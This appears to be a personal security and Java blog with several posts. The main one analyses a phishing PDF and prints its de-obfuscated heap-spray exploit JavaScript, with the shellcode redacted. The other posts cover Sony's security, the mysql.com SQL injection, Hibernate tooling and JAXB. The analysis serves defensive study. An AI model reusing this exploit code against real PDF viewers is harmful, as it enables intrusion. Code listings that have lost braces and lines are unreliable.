Updates from Nickolas Golubev Toggle Comment Threads | Keyboard Shortcuts

  • Nickolas Golubev 22:59 on January 28, 2013 Permalink | Reply  

    Decoding a PDF Virus E-Mail 

    Today I received a malicious email via gmail.

    Title: “Check this. It might be useful for u.”
    From: XXXX@aol.com via mx.aol.com 11:55 AM (2 hours ago) to Nick

    With some garbled HTML data in the text area and a MIME PDF attachment “621624.pdf”

    The email came from a someone who must have had me on their address book as I communicated with them previously years ago.

    Of course I had to investigate and uploaded the pdf to jeek.org for further analysis.


    The PDF contained a hidden javascript package which was further obfuscated.

    After manually de-obfuscating the code I came up with:

    var encoded = "a3tf31jre0........." (redacted)
    var decode1 = encoded.replace(/a3tf31jre/g,"%");
    var decoded = unescape(decode1);

    The encoded string breaks out to:

    var j_IgC = [31, 31, 15, 23];

    function _k_m()
    return app;

    function _b_(xVgFqV)
    var ___N = "";
    ___N = unescape(xVgFqV);
    return ___N;

    function get_ver()
    var ver = _k_m().viewerVersion.toString();
    ver = ver.replace(".", "");
    while (ver.length < 4)
    ver += "0";
    ver = parseInt(ver, 10);
    return ver;

    function make_block(xVgFqV, len)
    while (xVgFqV.length * 2 < len)
    xVgFqV += xVgFqV;
    xVgFqV = xVgFqV.substring(0, len/ 2);
    return xVgFqV;

    function heap_spray3(scode)
    scode = _b_(scode);
    var sclen = scode.length * 2;
    var fasdds = _b_("%u9090");
    var spray = make_block(fasdds,0x2000 - sclen);
    var block = scode + spray;
    block = make_block(block,0x80000 - 0x40);
    for (var i = 0;i<0x190;i ++)
    j_IgC[i] = block.substr(0,block.length - 1) + fasdds;

    function make_str(xVgFqV,len)
    while (xVgFqV.length < len){ xVgFqV += xVgFqV; }
    xVgFqV = xVgFqV.substring(0, len);
    return xVgFqV;

    function num2hex(num)
    var xVgFqV = num.toString(16);
    var len = xVgFqV.length;
    var ret = (len % 2) ? "0" + xVgFqV : xVgFqV;
    return ret;

    function str2uni(xVgFqV)
    var ret = "";
    for (var i = 0;i < xVgFqV.length;i += 2)
    ret += "%u";
    ret += num2hex(xVgFqV.charCodeAt(i + 1));
    ret += num2hex(xVgFqV.charCodeAt(i));
    return ret;

    function hex2str(hex)
    var ret = "";
    for (var i = 0;i < hex.length;i += 2) { var b = hex.substr(i,2); var num = parseInt(b,16); ret += String.fromCharCode(num); } return ret; } exploit(); function exploit() { var ver = get_ver(); if (ver >= 8000)
    var tiff = "SUkqADggAABB";
    var nops = make_str("QUFB",0x2ae8);
    var start "..."; (redacted)
    var foot = "";
    var sc_hex = "";

    if (ver < 8201)
    foot = "..."; (redacted)
    var sc_hex = "..."; (redacted)
    foot = "..."; (redacted)
    sc_hex = "..."; (redacted)

    if (foot.length)
    var ret = [tiff,nops,start,foot].join("");
    var sc_str = hex2str(sc_hex);
    var scode = str2uni(sc_str);
    pwzh6lr.rawValue = ret;

    After the PDF viewer is “heap sprayed” ( http://en.wikipedia.org/wiki/Heap_spraying ) the exploit payload that is injected goes out to download http://earthexplore.com/PDFS/XXXXXXX.exe (redacted). I have not analyzed the executable it self but would imagine that it is some sort of a trojan.

  • Nickolas Golubev 18:54 on June 23, 2011 Permalink | Reply  

    The dangers of stovepipe security 

    The recent events with Sony http://www.pcworld.com/businesscenter/article/229351/sony_hacked_again_how_not_to_do_network_security.html have got me thinking about the dangers of “stovepipe” security… (http://en.wikipedia.org/wiki/Stovepipe_%28organisation%29)

    A stovepipe is an organizational structure hinders cross organizational communications and collaboration.  It can be theorized that the different  sub companies / groups within Sony worked in a stove pipe security type model. There was likely no over-arching security guidance / policy or common, authoritative security department.

    Large enterprises should always have a clear and common security policy and a common corporate security department. Information about attacks and fixes at one department should be shared with others in an effort to combat any further damage.

    Lastly an organization should follow standard security standards like the ISO 27002  (http://en.wikipedia.org/wiki/ISO/IEC_27002) Why re-invent the wheel when proven, practical methodology already exists?

  • Nickolas Golubev 19:17 on April 7, 2011 Permalink | Reply  

    Sometimes I feel like this is very true! 

    Ideally a well structured project would define scope and architecture before any code has been written. In reality cowboy coding happens more often then not.

  • Nickolas Golubev 20:19 on March 29, 2011 Permalink | Reply  

    MySQL website comprimised by blind SQL injection attack 

    I found this new story to be quite ironic: http://www.h-online.com/security/news/item/MySQL-allegedly-hacked-via-SQL-injection-1216281.html

    Apparently the public facing mysql.com site was attacked through a blind SQL injection attack: ( https://secure.wikimedia.org/wikipedia/en/wiki/SQL_injection#Blind_SQL_injection ) and the internal database structure published by the hacker as proof.

    It really shows why Injection is #1 on the OWASP Top 10 list ( http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project )  when a large SQL vendor (Owned by Oracle) can’t even protect  against Blind SQL Injection on their public facing site!

  • Nickolas Golubev 16:55 on March 24, 2011 Permalink | Reply  

    Cryptic Hibernate Reverse Engineering Wizard Error 

    Today I tried to create some POJOs / HBM files automatically from a legacy database using the Netbeans 6.8 Hibernate tools. Everything was going great before and I could connect to the database using my hibernate.cfg.xml file in the actual code but then I ran the “Hibernate Reverse Engineering Wizard”…

    Problem #1: It could not find my hibernate.cfg.xml and I had to copy this file into my actual package directory where I was trying to generate the files.

    Problem #2: Okay the hibernate.cfg.xml was now read but a new error showed up “Database drivers are not added to the project classpath. Go to project properties to add database library.”

    After some digging around I finally figured out that the error is somewhat cryptic. The Microsoft SQL Server JDBC 4 library was actually in the path but the real problem was the connection string and the lack of specifying a connection driver class.

    Previously I had:


    This had to be changed to:


    Now the wizard did not error out any-more, success!

    Problem #3: While the wizard no longer errored out it also did not show a list of available tables, no matter though it did generate a very generic hibernate.reveng.xml file. The “New Hibernate Mapping Files and POJOs From Database” wizard accepted this file and created POJOs / HBM for every single table in the database. The only issue here was that I had to manually delete the default sys. schema tables which were of no use to me.

  • Nickolas Golubev 20:03 on March 22, 2011 Permalink | Reply  

    Unicode Technical Report #36 Unicode Security Considerations 

    This is an interesting read from the Unicode company:
    http://unicode.org/reports/tr36/ “Unicode Technical Report #36 Unicode Security Considerations”

    A great read on how Unicode character input and subsequent normalisation can be used as an attack vector.

  • Nickolas Golubev 16:06 on March 22, 2011 Permalink | Reply  

    Full circle: POJO to XSD to JAXB Generated Object 

    I have been exploring the most simple ways to serialise / generate XML from a POJO. I have used XStream a few years ago but wanted to try the JAXB Marshaller instead.

    I added some @XmlRootElement annotations to my POJO and child POJO (I guess making them less POJO like in the process).

    Then the @XmlTransient annotation had to be added to the child’s parent reference in order to avoid the “A cycle is detected in the object graph. This will cause infinitely deep XML” error and make JAXB ignore this reference on serialization.

    Generating XML at that point was pretty simple:

    java.io.StringWriter xmlSW = new StringWriter();
    JAXBContext jaxbContext = JAXBContext.newInstance(myPojo.getClass()); Marshaller marshaller = jaxbContext.createMarshaller();
    marshaller.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, true);
    marshaller.setProperty(Marshaller.JAXB_ENCODING, "UTF-8");
    marshaller.marshal(myPojo, xmlSW);
    log.debug("Our XML: " + xmlSW.toString());

    Then to get the XSD and write it system.out:

    java.io.StringWriter xsdSW = new StringWriter();
    JAXBContext jaxbContext = JAXBContext.newInstance(myPojo.getClass());
    final List results = new ArrayList();
    new SchemaOutputResolver(){

    public Result createOutput(String ns, String file)
    throws IOException {
    DOMResult result = new DOMResult();
    return result;

    DOMResult domResult = results.get(0);
    Document doc = (Document) domResult.getNode();
    OutputFormat format = new OutputFormat(doc);
    XMLSerializer serializer = new XMLSerializer(xsdSW, format);

    log.debug("Our XSD: " + xsdSW.toString());

    The cool thing that can be done now with the XSD is to run it through the JAXB generator which will re-create the parent and child classes automatically, with even more (somewhat assumed) annotations.

    Just thought it was a cool how you can go from POJO to XML/XSD back to a POJO relatively easily. Sort of similar to what you can do with WSDLs and creating web services and web service client’s with skeleton code around them using JAXB.

compose new post
next post/next comment
previous post/previous comment
show/hide comments
go to top
go to login
show/hide help
shift + esc